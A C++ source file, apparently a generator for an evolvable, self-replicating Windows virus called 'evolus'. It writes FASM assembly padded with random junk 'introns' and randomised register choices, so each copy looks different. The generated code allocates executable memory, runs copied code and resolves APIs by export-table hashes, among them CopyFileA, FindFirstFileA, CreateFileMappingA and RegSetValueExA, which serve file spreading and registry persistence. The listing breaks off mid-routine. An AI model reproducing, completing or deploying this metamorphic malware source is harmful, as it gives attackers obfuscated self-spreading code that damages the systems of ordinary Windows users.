evolus_factory/cii.cpp

1. #include <cstdlib>
2. #include <iostream>
3. #include <fstream>
4. #include <windows.h>
5. #include <stdio.h>
6. #include <tchar.h>
7. #include <list>
8. #include <math.h>
9. #include <sstream>
10. #include <vector>
11.  
12. using namespace std;
13.  
14. ofstream file;
15.  
16. string I2S(double n)
17. {
18.   stringstream out;
19.   out << n;
20.   string rv = out.str();
21.   return(rv);
22. }
23.  
24.  
25. void addnumber(string BigNum);
26. void GetAddress(string address);
27. void CallAPI(string APIName);
28. void CalcNewRandNumberAndSaveIt();
29. void nopdC();
30. void nopsC();
31. void zer0(int rr);
32. void subsaved(int rr);
33.  
34.  
35. #define IntronInsertThreshold 11
36. int IntronSTST;
37. int IntronNOP;
38. void CreateAnIntron()
39. {
40.      if (!(rand()%IntronInsertThreshold))
41.      {
42.          if (rand()%6)
43.          {
44.              // Here we use START+STOP intron
45.              
46.              file << "db StopCodon" << endl;
47.              while(rand()%31)
48.              {
49.                  
50.                  file << "db " << I2S((rand()%255)^0x67) << endl;
51.              }            
52.              file << "db StartCodon" << endl;
53.              IntronSTST++;
54.          }
55.          else
56.          {
57.              while(rand()%31)
58.              {                
59.                  //file << "db " << I2S((rand()%255)|0x91) << endl;
60.                  file << "_nopREAL" << endl;                                              
61.              }
62.              IntronNOP++;
63.          }        
64.      }
65. }
66.  
67. void addnumber(string BigNum)
68. {
69.         file << "    BigNum=" << BigNum << endl;
70.         file << "    AlreadyStarted=0" << endl; CreateAnIntron();
71.         file << "    if BigNum<25" << endl; CreateAnIntron();
72.         file << "        repeat BigNum" << endl;
73.         file << "            _add0001" << endl;
74.         file << "        end repeat" << endl;
75.         file << "    else" << endl;
76.         file << "        _pushall" << endl; CreateAnIntron();
77.         file << "        _push  ; BC1 to stack" << endl;
78.         file << "        _save" << endl; CreateAnIntron();
79.         file << "        _xor   ; BC1=0" << endl;
80.         file << "        _add0001" << endl; CreateAnIntron();
81.         file << "        _save" << endl;
82.         file << "        _sub0001 ; BC1=0, BC2=1" << endl; CreateAnIntron();
83.         file << "        irp num, 0x80000000,0x40000000,0x20000000,0x10000000,0x8000000,0x4000000,0x2000000,0x1000000,0x800000,0x400000,0x200000,0x100000,0x80000,0x40000,0x20000,0x10000,0x8000,0x4000,0x2000,0x1000,0x800,0x400,0x200,0x100,0x80,0x40,0x20,0x10,0x8,0x4,0x2,0x1" << endl;
84.         file << "        {" << endl;
85.         file << "            if AlreadyStarted=1" << endl;
86.         file << "                _shl" << endl;
87.         file << "            end if" << endl;
88.         file << "            if (BigNum AND num)>0" << endl;
89.         file << "                _add0001" << endl;
90.         file << "                AlreadyStarted=1" << endl;
91.         file << "            end if" << endl;
92.         file << "        }" << endl;
93.         file << "        _save           ; BC2=BigNum" << endl; CreateAnIntron();
94.         file << "        _pop            ; restore BC1" << endl;
95.         file << "        _addsaved       ; BC1=BC1+BigNum" << endl; CreateAnIntron();
96.         nopdC();
97.         file << "        _popall         ; Restore all registers" << endl;
98.         nopsC();
99.         file << "        _pushall        ; Restore ZF" << endl; CreateAnIntron();
100.         file << "        _save" << endl;
101.         file << "        _and" << endl;
102.         file << "        _popall" << endl;
103.         file << "    end if" << endl;
104.  
105. }  
106.  
107.  
108.  
109. void GetAddress(string address)
110. {
111.         file << "    _getDO" << endl; CreateAnIntron();
112.         string tmpstr=address+"-DataOffset"; CreateAnIntron();
113.         addnumber(tmpstr);
114. }
115.  
116.  
117. void CallAPI(string APIName)
118. {
119.         file << "    _getDO" << endl; CreateAnIntron();
120.         string tmpstr=APIName+"-DataOffset";
121.         addnumber(tmpstr); CreateAnIntron();
122.         file << "    _getdata" << endl;
123.         file << "    _call" << endl; CreateAnIntron();
124. }
125.  
126. void CalcNewRandNumberAndSaveIt()
127. {
128.         GetAddress("RandomNumber");
129.         file << "        _saveWrtOff" << endl; CreateAnIntron();
130.         file << "        _getdata" << endl; CreateAnIntron();
131.         file << "        _nopdA                   ; eax=[RandomNumber]" << endl; CreateAnIntron();
132.         zer0(0);
133.         addnumber("1103515245");        
134.         file << "        _mul                     ; eax*=1103515245 % 2^32" << endl; CreateAnIntron();
135.         zer0(0);
136.         addnumber("12345");     CreateAnIntron();
137.         file << "        _save" << endl;
138.         file << "        _nopsA" << endl; CreateAnIntron();
139.         file << "        _addsaved                ; eax+=12345 % 2^32" << endl;
140.         file << "        _writeDWord              ; mov [RandomNumber], ebx" << endl; CreateAnIntron();
141. }
142.  
143. void nopdC()
144. {
145.     file << "        _pushall                ; save all registers" << endl; CreateAnIntron();
146.     file << "        _push                   ; save BC1" << endl; CreateAnIntron();
147.     file << "        _getDO                  ; For code-optimization, RegC is at DataOffset+0x0. But could be anywhere as _add0001 exists." << endl; CreateAnIntron();
148.     file << "        _saveWrtOff             ; BA1=RegC" << endl; CreateAnIntron();
149.     file << "        _pop" << endl; CreateAnIntron();
150.     file << "        _writeDWord             ; mov dword[RegC], BC1" << endl; CreateAnIntron();
151.     file << "        _popall                 ; restore all registers" << endl; CreateAnIntron();
152. }
153.  
154.  
155. void nopsC()
156. {
157.     file << "        _getDO                  ; For code-optimization, RegC is at DataOffset+0x0. But could be anywhere as _add0001 exists." << endl; CreateAnIntron();
158.     file << "        _getdata" << endl; CreateAnIntron();
159. }
160.  
161.  
162.  
163. void zer0(int rr)
164. {
165.     if (rr!=0)
166.     {
167.         file << "_pushall" << endl; CreateAnIntron();
168.     }
169.  
170.     file << "_save           ; BC2=BC1" << endl; CreateAnIntron();
171.     file << "_xor            ; BC1=BC1 XOR BC2 = 0" << endl; CreateAnIntron();
172.  
173.     if (rr!=0)
174.     {
175.         nopdC();
176.         file << "_popall" << endl;
177.         nopsC(); CreateAnIntron();
178.     }
179. }
180.  
181.  
182. void subsaved(int rr)
183. {
184.     if (rr!=0)
185.     {
186.         file << "        _pushall" << endl; CreateAnIntron();
187.     }
188.         file << "        _push           ; save BC1" << endl; CreateAnIntron();
189.         zer0(1);
190.         file << "        _sub0001        ; BC1=0xFFFFFFFF" << endl; CreateAnIntron();
191.         file << "        _xor            ; BC1=0xFFFFFFFF XOR BC2" << endl; CreateAnIntron();
192.         file << "        _add0001        ; BC1=-BC2" << endl; CreateAnIntron();
193.         file << "        _save           ; BC2=-BC2" << endl; CreateAnIntron();
194.         file << "        _pop            ; restore BC1" << endl; CreateAnIntron();
195.         file << "        _addsaved       ; BC1=BC1+(-BC2)" << endl; CreateAnIntron();
196.  
197.     if (rr!=0)
198.     {
199.         CreateAnIntron();
200.         nopdC(); CreateAnIntron();
201.         file << "        _popall" << endl; CreateAnIntron();
202.         nopsC(); CreateAnIntron();
203.         file << "        _pushall        ; Restore ZF" << endl; CreateAnIntron();
204.         file << "        _save" << endl; CreateAnIntron();
205.         file << "        _and" << endl; CreateAnIntron();
206.         file << "        _popall" << endl; CreateAnIntron();        
207.     }
208. }
209.  
210.  
211.  
212. vector<string> RemoveElement(vector<string> *List, string Element)
213. {
214.     if (Element!="")
215.     {
216.         List->push_back("");
217.         for (vector<string>::iterator i=List->begin(); i!=List->end(); ++i)
218.         {
219.             if ((*i)==Element) { List->erase(i); }
220.         }
221.         List->erase(List->end());
222.     }
223.     return(*List);
224. }
225.  
226. #define TranslatorIntron 2
227. int cIntronN;
228. void CreateIntronTranslator(bool wFlags=0, string El1="", string El2="", string El3="", string El4="", string El5="", string El6="", string El7="", string El8="")
229. {
230. //    cout << wFlags << wEAX << wEBX << wECX << wEDX << wEBP << wESI << wEDI << endl << "- - -" << endl;
231.     vector<string> AllReg;
232.     AllReg.push_back("EAX"); AllReg.push_back("EBX"); AllReg.push_back("ECX"); AllReg.push_back("EDX");
233.     AllReg.push_back("EDI"); AllReg.push_back("ESI"); AllReg.push_back("EBP"); AllReg.push_back("ESP");
234.    
235.     vector<string> UnUsedReg;
236.     UnUsedReg.push_back("EAX"); UnUsedReg.push_back("EBX"); UnUsedReg.push_back("ECX"); UnUsedReg.push_back("EDX");
237.     UnUsedReg.push_back("EDI"); UnUsedReg.push_back("ESI"); UnUsedReg.push_back("EBP");
238.     UnUsedReg=RemoveElement(&UnUsedReg,El1);
239.     UnUsedReg=RemoveElement(&UnUsedReg,El2);
240.     UnUsedReg=RemoveElement(&UnUsedReg,El3);
241.     UnUsedReg=RemoveElement(&UnUsedReg,El4);
242.     UnUsedReg=RemoveElement(&UnUsedReg,El5);
243.     UnUsedReg=RemoveElement(&UnUsedReg,El6);
244.     UnUsedReg=RemoveElement(&UnUsedReg,El7);
245.     UnUsedReg=RemoveElement(&UnUsedReg,El8);                            
246.        
247.     vector<string> ArithOp2Arg;
248.     ArithOp2Arg.push_back("add");
249.     ArithOp2Arg.push_back("sub");
250.     ArithOp2Arg.push_back("xor");
251.     ArithOp2Arg.push_back("and");
252.     ArithOp2Arg.push_back("or");
253.     ArithOp2Arg.push_back("cmp");
254.     ArithOp2Arg.push_back("test");
255.    
256.     vector<string> ArithOp1Arg;
257.     ArithOp1Arg.push_back("inc");
258.     ArithOp1Arg.push_back("dec");
259.  
260.     vector<string> ShiftVec;    
261.     ShiftVec.push_back("shr");
262.     ShiftVec.push_back("shl");    
263.        
264.    
265.     if (!(rand()%TranslatorIntron))
266.     {
267.         cIntronN++;
268.  
269.         if (wFlags)
270.         {
271.             while (rand()%13)
272.             {
273.                 int rr=rand()%8;
274.                 if (rr<3)  { file << "nop" << endl; }
275.                 if (rr==4) { file << "mov "  << UnUsedReg[rand()%UnUsedReg.size()] << "," << AllReg[rand()%AllReg.size()] << endl; }
276.                 if (rr==5) { file << "mov "  << UnUsedReg[rand()%UnUsedReg.size()] << "," << rand() << endl; }                                
277.                 if (rr==6) { file << "xchg " << UnUsedReg[rand()%UnUsedReg.size()] << "," << UnUsedReg[rand()%UnUsedReg.size()] << endl; }
278.                 if (rr==7) { file << "push " << AllReg[rand()%AllReg.size()] << endl << "pop " << UnUsedReg[rand()%UnUsedReg.size()] << endl; }
279.                 if (rr==8) { file << "push " << rand() << endl << "pop " << UnUsedReg[rand()%UnUsedReg.size()] << endl; }                
280.             }
281.         }
282.         else
283.         {
284.             while (rand()%13)
285.             {
286.                 int rr=rand()%25;                          
287.                 if (rr<3)  { file << "nop" << endl; }
288.                 if (rr==4) { file << "mov "  << UnUsedReg[rand()%(UnUsedReg.size())] << "," << AllReg[rand()%(AllReg.size())] << endl; }
289.                 if (rr==5) { file << "mov "  << UnUsedReg[rand()%(UnUsedReg.size())] << "," << rand() << endl; }                
290.                 if (rr==6) { file << "xchg " << UnUsedReg[rand()%(UnUsedReg.size())] << "," << UnUsedReg[rand()%(UnUsedReg.size())] << endl; }
291.                 if (rr==7) { file << "push " << AllReg[rand()%(AllReg.size())] << endl << "pop " << UnUsedReg[rand()%(UnUsedReg.size())] << endl; }
292.                 if (rr==8) { file << "push " << rand() << endl << "pop " << UnUsedReg[rand()%(UnUsedReg.size())] << endl; }                  
293.                 if (rr>8 && rr<=13)  { file << ArithOp2Arg[rand()%ArithOp2Arg.size()] << " " << UnUsedReg[rand()%UnUsedReg.size()] << "," << AllReg[rand()%AllReg.size()] << endl; }
294.                 if (rr>13 && rr<=16) { file << ArithOp2Arg[rand()%ArithOp2Arg.size()] << " " << UnUsedReg[rand()%UnUsedReg.size()] << "," << rand() << endl; }
295.                 if (rr>16 && rr<=20) { file << ArithOp1Arg[rand()%ArithOp1Arg.size()] << " " << UnUsedReg[rand()%UnUsedReg.size()] << endl; }
296.                 if (rr>20 && rr<=23) { file << ShiftVec[rand()%ShiftVec.size()] << " " << UnUsedReg[rand()%UnUsedReg.size()] << ", " << rand()%(0x100) << endl; }
297.                 if (rr>23) { file << ShiftVec[rand()%ShiftVec.size()] << " " << UnUsedReg[rand()%UnUsedReg.size()] << ", cl" <<  endl; }                        
298.             }
299.         }
300.     }
301. }
302.  
303.  
304. void ZeroRegister(string Reg)
305. {
306.     int rr=rand()%4;
307.     if (rr==0)
308.     {
309.         file << "mov " << Reg << ",0" << endl;
310.     }
311.     if (rr==1)
312.     {
313.         file << "xor " << Reg << "," << Reg << endl;
314.     }
315.     if (rr==2)
316.     {
317.         file << "sub " << Reg << "," << Reg << endl;
318.     }
319.     if (rr==3)
320.     {
321.         file << "push 0" << endl << "pop " << Reg << endl;
322.     }
323. }
324.  
325.  
326. void MovRegNum(string Reg, int Num)
327. {
328.     int rr=rand()%5;
329.     if (rr==0)
330.     {
331.         file << "mov "<< Reg << "," << Num << endl;
332.     }
333.     if (rr==1)
334.     {
335.         ZeroRegister(Reg);
336.         file << "add "<< Reg << "," << Num << endl;
337.     }
338.     if (rr==2)
339.     {
340.         ZeroRegister(Reg);
341.         file << "sub "<< Reg << ",-" << Num << endl;
342.     }
343.     if (rr==3)
344.     {
345.         ZeroRegister(Reg);
346.         file << "xor "<< Reg << "," << Num << endl;
347.     }
348.     if (rr==4)
349.     {
350.         ZeroRegister(Reg);
351.         file << "or "<< Reg << "," << Num << endl;
352.     }
353. }
354.  
355. void Lea(string Reg, string Address, string Num)
356. {
357.     int rr=rand()%2;
358.     if (rr==0)
359.     {
360.         file << "mov "<< Reg << "," << Address << endl;
361.         file << "add "<< Reg << "," << Num << endl;
362.     }
363.     if (rr==1)
364.     {
365.         ZeroRegister(Reg);
366.         file << "lea "<< Reg << ",[" << Address << "+" << Num << "]" << endl;
367.     }
368. }
369.  
370. int main()
371. {
372.     // Get the list of process identifiers.
373.     cout << "\nCreate evolus with introns\n" << endl;
374.     cout <<   "**************************\n\n" << endl;
375. IntronSTST=0;
376. IntronNOP=0;
377. cIntronN=0;
378.     srand ( time(NULL) );
379.  
380.  
381.     file.open("evolus.asm");
382.  
383.     vector<string> UseReg;
384.     UseReg.push_back("EAX"); UseReg.push_back("EBX"); UseReg.push_back("EDX");
385.    
386.     string SplicSepX=UseReg[rand()%UseReg.size()]; string SplicSepL=SplicSepX.substr(1,1)+"L"; UseReg=RemoveElement(&UseReg,SplicSepX);
387. //    cout << "SplicSepX: " << SplicSepX << endl;    
388.    
389.     UseReg.push_back("ECX");
390.     string CodonContX=UseReg[rand()%UseReg.size()]; string CodonContL=CodonContX.substr(1,1)+"L"; UseReg=RemoveElement(&UseReg,CodonContX);
391. //    cout << "CodonContX: " << CodonContX << endl;
392.    
393.     UseReg.push_back("EBP"); UseReg=RemoveElement(&UseReg,"ECX");
394.     string CodonCount=UseReg[rand()%UseReg.size()]; UseReg=RemoveElement(&UseReg,CodonCount);  
395. //    cout << "CodonCount: " << CodonCount << endl;  
396.    
397.     UseReg.push_back(CodonContX); UseReg.push_back("ECX");
398.     string TmpReg=UseReg[rand()%UseReg.size()];    
399. //    cout << "TmpReg: " << TmpReg << endl;      
400. //    cin.get();
401.    
402.  
403. file << "include " << static_cast<char>(39) << "E:" << static_cast<char>(92) << "Programme" << static_cast<char>(92) << "FASM" << static_cast<char>(92) << "INCLUDE" << static_cast<char>(92) << "win32ax.inc" << static_cast<char>(39) << "" << endl;
404. file << "" << endl;
405. file << "RndNum = %t AND 0xFFFF" << static_cast<char>(39) << "FFFF" << endl;
406. file << "macro GetNewRandomNumber" << endl;
407. file << "{" << endl;
408. file << "    RndNum = ((RndNum*214013+2531011) AND 0xFFFF" << static_cast<char>(39) << "FFFF)" << endl;
409. file << "}" << endl;
410. file << "" << endl;
411. file << ".data" << endl;
412. file << "       include " << static_cast<char>(39) << "data_n_equs.inc" << static_cast<char>(39) << "" << endl;
413. file << ";        a db " << static_cast<char>(34) << "Am I allowed to live?" << static_cast<char>(34) << ",0x0" << endl;
414. file << ";        b db " << static_cast<char>(34) << "In evolution we trust" << static_cast<char>(34) << ",0x0" << endl;
415. file << "" << endl;
416. file << "" << endl;
417. file << ".code" << endl;
418. file << "start:" << endl;
419. while(rand()%11){ CreateIntronTranslator(); }
420. file << "" << endl; CreateIntronTranslator();
421. file << "       AlignedSize=0x1" << static_cast<char>(39) << "0000" << endl;
422. file << "       while ((EndAmino-StAmino)*8)>AlignedSize" << endl;
423. file << "           AlignedSize=AlignedSize+0x1" << static_cast<char>(39) << "0000" << endl;
424. file << "       end while" << endl;
425. file << "" << endl; CreateIntronTranslator();
426. file << " push PAGE_EXECUTE_READWRITE" << endl; CreateIntronTranslator();
427. file << " push 0x1000" << endl;CreateIntronTranslator();
428. file << " push AlignedSize" << endl; CreateIntronTranslator();
429. file << " push 0x0" << endl; CreateIntronTranslator();
430. file << " stdcall [VirtualAlloc]" << endl; CreateIntronTranslator(0, "EAX");
431. file << "       mov     [Place4Life], eax" << endl; CreateIntronTranslator();
432. ZeroRegister(SplicSepX); CreateIntronTranslator(0, SplicSepX);
433. ZeroRegister(CodonCount); CreateIntronTranslator(0, SplicSepX, CodonCount);
434. file << "       WriteMoreToMemory:" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount);
435. ZeroRegister(CodonContX); CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
436. file << "               mov     " << CodonContL << ", byte[" << CodonCount << "+StAmino]" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
437. file << "               cmp     " << CodonContL << ", StartCodon " << endl; CreateIntronTranslator(1, SplicSepX, CodonCount, CodonContX);
438. file << "               jne     SplicingNoStart" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
439. ZeroRegister(SplicSepX); CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
440. file << "               SplicingNoStart:" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
441. file << "               cmp     " << CodonContL << ", StopCodon" << endl; CreateIntronTranslator(1, SplicSepX, CodonCount, CodonContX);
442. file << "               jne     SplicingNoStop" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
443. MovRegNum(SplicSepX, 0x91); CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
444. file << "               SplicingNoStop:" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
445. file << "               or      " << CodonContL << ", " << SplicSepL <<  endl; CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
446. file << "               shl     " << CodonContX << ", 3" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, CodonContX);
447. Lea("ESI", "StartAlphabeth", CodonContX);
448. file << "               mov     " << TmpReg << "," << CodonCount << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, TmpReg, "ESI");
449. file << "               shl     " << TmpReg << ", 3" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, TmpReg, "ESI");
450. file << "               mov     edi, [Place4Life]" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, TmpReg, "ESI", "EDI");
451. file << "               add     edi, " << TmpReg << endl; CreateIntronTranslator(0, SplicSepX, CodonCount, "ESI", "EDI");
452. MovRegNum("ECX", 8); CreateIntronTranslator(0, SplicSepX, CodonCount, "ESI", "EDI", "ECX");
453. file << "               rep     movsb" << endl; CreateIntronTranslator(0, SplicSepX, CodonCount);
454. file << "               inc     " << CodonCount << endl;  CreateIntronTranslator(0, SplicSepX, CodonCount);
455. file << "       cmp     " << CodonCount << ", (EndAmino-StAmino)" << endl;  CreateIntronTranslator(1, SplicSepX, CodonCount);
456. file << "       jne     WriteMoreToMemory" << endl; CreateIntronTranslator();
457. while(rand()%11){ CreateIntronTranslator(); }
458. file << "       call    [Place4Life]                            ; Lets start!!!" << endl; CreateIntronTranslator();
459. file << "" << endl;
460. while(rand()%11){ CreateIntronTranslator(); }
461. file << "" << endl;
462. file << "" << endl;
463. file << "" << endl;
464. file << "; ##################################################################" << endl;
465. file << "; Alphabeth" << endl;
466. file << "StartAlphabeth:" << endl;
467. file << "include " << static_cast<char>(39) << "alphabeth.inc" << static_cast<char>(39) << "" << endl;
468. file << "CreateAlphabet" << endl;
469. file << "" << endl;
470. file << "EndAlphabeth:" << endl;
471. file << "" << endl;
472. file << "; ##################################################################" << endl;
473. file << "" << endl;
474. //file << "include " << static_cast<char>(39) << "instruction_set_macros.inc" << static_cast<char>(39) << "" << endl;
475. file << "" << endl;
476. file << "; ##################################################################" << endl;
477. file << "; Amino Acids" << endl;
478. for (int i=0; i<500; i++) { CreateAnIntron(); }
479. file << "StAmino:" << endl;
480. for (int i=0; i<500; i++) { CreateAnIntron(); }
481. file << "" << endl;
482. file << "; ############################################################################" << endl;
483. file << "; ############################################################################" << endl;
484. file << "; ############################################################################" << endl;
485. file << "; #####" << endl;
486. file << "; #####  Here the genom gets the Addresses of the Windows APIs." << endl;
487. file << "; #####  It loads via LoadLibrary the kernel32.dll and advapi32.dll," << endl;
488. file << "; #####  searchs in the Export Table for the adequade API (creating" << endl;
489. file << "; #####  an internal 12 bit checksum, and compares it with some hardcoded" << endl;
490. file << "; #####  12bit values). This procedere should be evolvable." << endl;
491. file << "; #####" << endl;
492. file << "; #####  Optimum would have been to call the Windows APIs by its" << endl;
493. file << "; #####  Ordinal Numbers, but they change at every release of Windows." << endl;
494. file << "; #####" << endl;
495. file << "; #####  At Linux, evolvable API calls are already presented, as you" << endl;
496. file << "; #####  call int 0x80 with a specific number in eax which represents" << endl;
497. file << "; #####  the API number." << endl;
498. file << "; #####" << endl;
499. file << "; #####" << endl;
500. file << ";" << endl;
501. file << "; The Hash-Algo is equivalent to:" << endl;
502. file << "; ===============================" << endl;
503. file << ";" << endl;
504. file << ";;FindAPIGiveMeTheHash:" << endl;
505. file << ";; In: ebx=pointer to API name" << endl;
506. file << ";; Out: eax=Hash   (in ax)" << endl;
507. file << ";; changed: eax" << endl;
508. file << ";;        mov     ebx, apistr" << endl;
509. file << ";" << endl;
510. file << ";        push    ebx" << endl;
511. file << ";        push    ecx" << endl;
512. file << ";        push    edx" << endl;
513. file << ";        xor     eax, eax" << endl;
514. file << ";        xor     ecx, ecx" << endl;
515. file << ";        dec     ebx" << endl;
516. file << ";        FindAPIGiveMeTheHashMore:" << endl;
517. file << ";                inc     ebx" << endl;
518. file << ";                mov     ecx, dword[ebx]" << endl;
519. file << ";                xor     eax, ecx" << endl;
520. file << ";                mov     edx, ecx        ; ecx=nooo - n ... new byte" << endl;
521. file << ";                shr     edx, 8          ; edx=000n ... new byte" << endl;
522. file << ";                cmp     dl, 0           ; dl=n" << endl;
523. file << ";        jne     FindAPIGiveMeTheHashMore" << endl;
524. file << ";" << endl;
525. file << ";        and     eax, 0x0FFF" << endl;
526. file << ";        pop     edx" << endl;
527. file << ";        pop     ecx" << endl;
528. file << ";        pop     ebx" << endl;
529. file << ";ret" << endl;
530. file << "" << endl;
531. file << "" << endl;
532. file << "" << endl;
533. file << "StAminoAcids1:" << endl;
534. file << ";        repeat 100" << endl;
535. file << ";            _nopREAL" << endl;
536. file << ";        end repeat" << endl;
537. file << "" << endl;
538. file << "" << endl;
539. file << "       db _START" << endl;
540. file << "       db _STOP" << endl;
541. file << "" << endl;
542. file << "       db _START" << endl;
543. file << "" << endl;
544. GetAddress("mCloseHandle");
545. file << "       _saveWrtOff" << endl; CreateAnIntron();
546. zer0(0);
547. addnumber("0x0342");
548. file << "       _writeDWord" << endl; CreateAnIntron();
549. file << "" << endl;
550. GetAddress("mCopyFileA");
551. file << "       _saveWrtOff" << endl; CreateAnIntron();
552. zer0(0);
553. addnumber("0x0C5C");
554. file << "       _writeDWord" << endl; CreateAnIntron();
555. file << "" << endl;
556. GetAddress("mCreateFileA");
557. file << "       _saveWrtOff" << endl; CreateAnIntron();
558. zer0(0);
559. addnumber("0x0615");
560. file << "       _writeDWord" << endl; CreateAnIntron();
561. file << "" << endl;
562. GetAddress("mCreateFileMappingA");
563. file << "       _saveWrtOff" << endl; CreateAnIntron();
564. zer0(0);
565. addnumber("0x04E1");
566. file << "       _writeDWord" << endl; CreateAnIntron();
567. file << "" << endl;
568. GetAddress("mCreateProcessA");
569. file << "       _saveWrtOff" << endl; CreateAnIntron();
570. zer0(0);
571. addnumber("0x0674");
572. file << "       _writeDWord" << endl; CreateAnIntron();
573. file << "" << endl;
574. GetAddress("mGetDriveTypeA");
575. file << "       _saveWrtOff" << endl; CreateAnIntron();
576. zer0(0);
577. addnumber("0x0AFD");
578. file << "       _writeDWord" << endl; CreateAnIntron();
579. file << "" << endl;
580. GetAddress("mGetCommandLineA");
581. file << "       _saveWrtOff" << endl; CreateAnIntron();
582. zer0(0);
583. addnumber("0x06A8");
584. file << "       _writeDWord" << endl; CreateAnIntron();
585. file << "" << endl;
586. GetAddress("mGetFileSize");
587. file << "       _saveWrtOff" << endl; CreateAnIntron();
588. zer0(0);
589. addnumber("0x083B");
590. file << "       _writeDWord" << endl; CreateAnIntron();
591. file << "" << endl;
592. GetAddress("mWriteFile");
593. file << "       _saveWrtOff" << endl; CreateAnIntron();
594. zer0(0);
595. addnumber("0x078B");
596. file << "       _writeDWord" << endl; CreateAnIntron();
597. file << "" << endl;
598. GetAddress("mGetTickCount");
599. file << "       _saveWrtOff" << endl; CreateAnIntron();
600. zer0(0);
601. addnumber("0x01B4");
602. file << "       _writeDWord" << endl; CreateAnIntron();
603. file << "" << endl;
604. GetAddress("mMapViewOfFile");
605. file << "       _saveWrtOff" << endl; CreateAnIntron();
606. zer0(0);
607. addnumber("0x05EE");
608. file << "       _writeDWord" << endl; CreateAnIntron();
609. file << "" << endl;
610. GetAddress("mSleep");
611. file << "       _saveWrtOff" << endl; CreateAnIntron();
612. zer0(0);
613. addnumber("0x07F9");
614. file << "       _writeDWord" << endl; CreateAnIntron();
615. file << "" << endl;
616. GetAddress("mFindFirstFileA");
617. file << "       _saveWrtOff" << endl; CreateAnIntron();
618. zer0(0);
619. addnumber("0x094A");
620. file << "       _writeDWord" << endl; CreateAnIntron();
621. file << "" << endl;
622. GetAddress("mFindNextFileA");
623. file << "       _saveWrtOff" << endl; CreateAnIntron();
624. zer0(0);
625. addnumber("0x0FE1");
626. file << "       _writeDWord" << endl; CreateAnIntron();
627. file << "" << endl;
628. GetAddress("mUnmapViewOfFile");
629. file << "       _saveWrtOff" << endl; CreateAnIntron();
630. zer0(0);
631. addnumber("0x01D1");
632. file << "       _writeDWord" << endl; CreateAnIntron();
633. file << "" << endl;
634. GetAddress("mSetErrorMode");
635. file << "       _saveWrtOff" << endl; CreateAnIntron();
636. zer0(0);
637. addnumber("0x0CBB");
638. file << "       _writeDWord" << endl; CreateAnIntron();
639. file << "" << endl;
640. GetAddress("mRegCreateKeyA");
641. file << "       _saveWrtOff" << endl; CreateAnIntron();
642. zer0(0);
643. addnumber("0x0EDC");
644. file << "       _writeDWord" << endl; CreateAnIntron();
645. file << "" << endl;
646. GetAddress("mRegSetValueExA");
647. file << "       _saveWrtOff" << endl; CreateAnIntron();
648. zer0(0);
649. addnumber("0x0845");
650. file << "       _writeDWord" << endl; CreateAnIntron();
651. file << "" << endl;
652. file << "" << endl;
653. GetAddress("stDLLkernel32");
654. file << "       _saveWrtOff                      ; to the data-section. This will be used" << endl; CreateAnIntron();
655. file << "       _nopdA                           ; by LoadLibraryA as argument later" << endl; CreateAnIntron();
656. zer0(0);
657. addnumber("\'kern\'");
658. file << "       _writeDWord" << endl; CreateAnIntron();
659. file << "" << endl;
660. file << "       _nopsA" << endl; CreateAnIntron();
661. addnumber("4");
662. file << "       _saveWrtOff" << endl; CreateAnIntron();
663. file << "       _nopdA" << endl; CreateAnIntron();
664. zer0(0);
665. addnumber("\'el32\'");
666. file << "       _writeDWord" << endl; CreateAnIntron();
667. file << "" << endl;
668. file << "       _nopsA" << endl; CreateAnIntron();
669. addnumber("4");
670. file << "       _saveWrtOff" << endl; CreateAnIntron();
671. file << "       _nopdA" << endl; CreateAnIntron();
672. zer0(0);
673. addnumber("\'.dll\'");
674. file << "       _writeDWord" << endl; CreateAnIntron();
675.  
676. GetAddress("stDLLadvapi32");
677. file << "       _saveWrtOff" << endl; CreateAnIntron();
678. file << "       _nopdA" << endl; CreateAnIntron();
679. zer0(0);
680. addnumber("\'adva\'");
681. file << "       _writeDWord" << endl; CreateAnIntron();
682.  
683. file << "       _nopsA" << endl; CreateAnIntron();
684. addnumber("4");
685. file << "       _saveWrtOff" << endl; CreateAnIntron();
686. file << "       _nopdA" << endl; CreateAnIntron();
687. zer0(0);
688. addnumber("\'pi32\'");
689. file << "       _writeDWord" << endl; CreateAnIntron();
690.  
691. file << "       _nopsA" << endl; CreateAnIntron();
692. addnumber("4");
693. file << "       _saveWrtOff" << endl; CreateAnIntron();
694. file << "       _nopdA" << endl; CreateAnIntron();
695. zer0(0);
696. addnumber("\'.dll\'");
697. file << "       _writeDWord" << endl; CreateAnIntron();
698.  
699.  
700. GetAddress("stDLLkernel32");
701. file << "       _push" << endl; CreateAnIntron();
702. file << "       _CallAPILoadLibrary      ; invoke LoadLibrary, " << static_cast<char>(34) << "kernel32.dll" << static_cast<char>(34) << "" << endl; CreateAnIntron();
703.  
704. GetAddress("hDLLlibrary32");
705. file << "       _saveWrtOff" << endl; CreateAnIntron();
706.  
707.  
708. file << "       _nopsA" << endl; CreateAnIntron();
709. file << "       _writeDWord              ; mov dword[hDLLkernel32], eax" << endl; CreateAnIntron();
710.  
711. file << "       _save                    ; Save kernel32.dll position" << endl; CreateAnIntron();
712. addnumber("0x3C");
713. file << "       _getdata                 ; mov RegB, dword[hDLLkernel32+0x3C]" << endl; CreateAnIntron();
714. file << "                                ; = Pointer to PE Header of kernel32.dll" << endl; CreateAnIntron();
715. file << "       _addsaved                ; relative -> absolut" << endl; CreateAnIntron();
716.  
717. addnumber("0x78");
718. file << "       _getdata                 ; Export Tables" << endl; CreateAnIntron();
719. file << "       _addsaved                ; relative -> absolut" << endl; CreateAnIntron();
720. addnumber("0x1C");
721.  
722. file << "       _nopdA                   ; temporarily save Offset of Addresse Table in RegA" << endl; CreateAnIntron();
723.  
724. GetAddress("hAddressTable");
725. file << "       _saveWrtOff              ; WriteOffset=hAddressTable" << endl; CreateAnIntron();
726.  
